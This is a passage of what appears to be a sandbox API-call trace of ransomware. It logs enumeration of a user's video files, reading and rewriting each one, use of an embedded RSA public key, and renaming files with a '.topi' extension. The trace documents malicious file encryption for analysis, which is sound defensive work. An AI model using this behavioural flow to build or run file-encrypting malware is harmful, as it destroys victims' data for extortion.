dwFlags=0x0, lpMem=0x99e5288 | out: hHeap=0x680000) returned 1 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5270 | out: hHeap=0x680000) returned 1 [0099.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5240 | out: hHeap=0x680000) returned 1 [0099.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3112760 | out: hHeap=0x680000) returned 1 [0099.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0099.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0099.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5228 | out: hHeap=0x680000) returned 1 [0099.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fc190 | out: hHeap=0x680000) returned 1 [0099.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0099.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0099.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0099.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0099.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0099.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0099.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0099.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0099.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0099.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0099.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0099.120] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x6988, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x6988, lpOverlapped=0x0) returned 1 [0099.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0099.120] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x698d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.120] WriteFile (in: hFile=0x6a8, lpBuffer=0x99df068*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99df068*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0099.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0099.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0099.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0099.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0099.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0099.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0099.121] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0099.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0099.121] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.121] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0099.121] CloseHandle (hObject=0x6a8) returned 1 [0099.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xf0) returned 0x9a03438 [0099.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8f0) returned 0x31cf750 [0099.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0099.133] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\S3Ct-Q.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\sfjurkoqtjwunyd54_k\\s3ct-q.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\S3Ct-Q.swf.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\sfjurkoqtjwunyd54_k\\s3ct-q.swf.topi")) returned 1 [0099.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.134] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0099.135] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba7ade90, ftCreationTime.dwHighDateTime=0x1d5bdc1, ftLastAccessTime.dwLowDateTime=0xc8a18220, ftLastAccessTime.dwHighDateTime=0x1d5b8ef, ftLastWriteTime.dwLowDateTime=0xc8a18220, ftLastWriteTime.dwHighDateTime=0x1d5b8ef, nFileSizeHigh=0x0, nFileSizeLow=0x18bf9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uL3JbDPLZoKmG.avi", cAlternateFileName="UL3JBD~1.AVI")) returned 1 [0099.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x136) returned 0x31ce620 [0099.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.135] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\uL3JbDPLZoKmG.avi") returned=".avi" [0099.135] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\uL3JbDPLZoKmG.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\sfjurkoqtjwunyd54_k\\ul3jbdplzokmg.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0099.136] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=101369) returned 1 [0099.136] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0099.138] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x18bd3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.138] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0099.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0099.139] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.139] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.139] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x18bf9, lpOverlapped=0x0) returned 1 [0099.140] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0099.140] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.140] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.140] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0099.141] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0099.141] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.141] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0099.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0099.141] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0099.141] GetLastError () returned 0x0 [0099.141] CryptDestroyHash (hHash=0x31c7580) returned 1 [0099.141] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0099.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0099.141] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0099.141] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0099.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.141] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0099.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0099.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18c00) returned 0x9a06a00 [0099.142] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.142] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0099.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0099.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0099.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0099.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fc190 [0099.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5228 [0099.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fc1d8 [0099.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5240 [0099.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5270 [0099.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0099.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5288 [0099.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0099.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0099.142] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0099.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0099.142] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5270 | out: hHeap=0x680000) returned 1 [0099.142] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5288 | out: hHeap=0x680000) returned 1 [0099.142] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0099.142] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0099.142] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0099.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0099.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0099.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5288 [0099.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0099.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e5270 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0099.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0099.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5288 | out: hHeap=0x680000) returned 1 [0099.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0099.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5270 | out: hHeap=0x680000) returned 1 [0099.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0099.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0099.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0099.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0099.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0099.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0099.143] GetCurrentThreadId () returned 0x8c4 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99e3a00 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x3112760 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.143] GetCurrentThreadId () returned 0x8c4 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0099.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0099.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0099.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5270 [0099.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0099.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5288 [0099.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0099.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5258 [0099.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0099.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0099.145] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\uL3JbDPLZoKmG.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\sfjurkoqtjwunyd54_k\\ul3jbdplzokmg.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\uL3JbDPLZoKmG.avi.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\sfjurkoqtjwunyd54_k\\ul3jbdplzokmg.avi.topi")) returned 1 [0099.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.146] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0099.147] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe077e110, ftCreationTime.dwHighDateTime=0x1d5c168, ftLastAccessTime.dwLowDateTime=0x8384c680, ftLastAccessTime.dwHighDateTime=0x1d5bc9a, ftLastWriteTime.dwLowDateTime=0x8384c680, ftLastWriteTime.dwHighDateTime=0x1d5bc9a, nFileSizeHigh=0x0, nFileSizeLow=0xd7ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WshG32B.flv", cAlternateFileName="")) returned 1 [0099.147] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\WshG32B.flv") returned=".flv" [0099.147] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 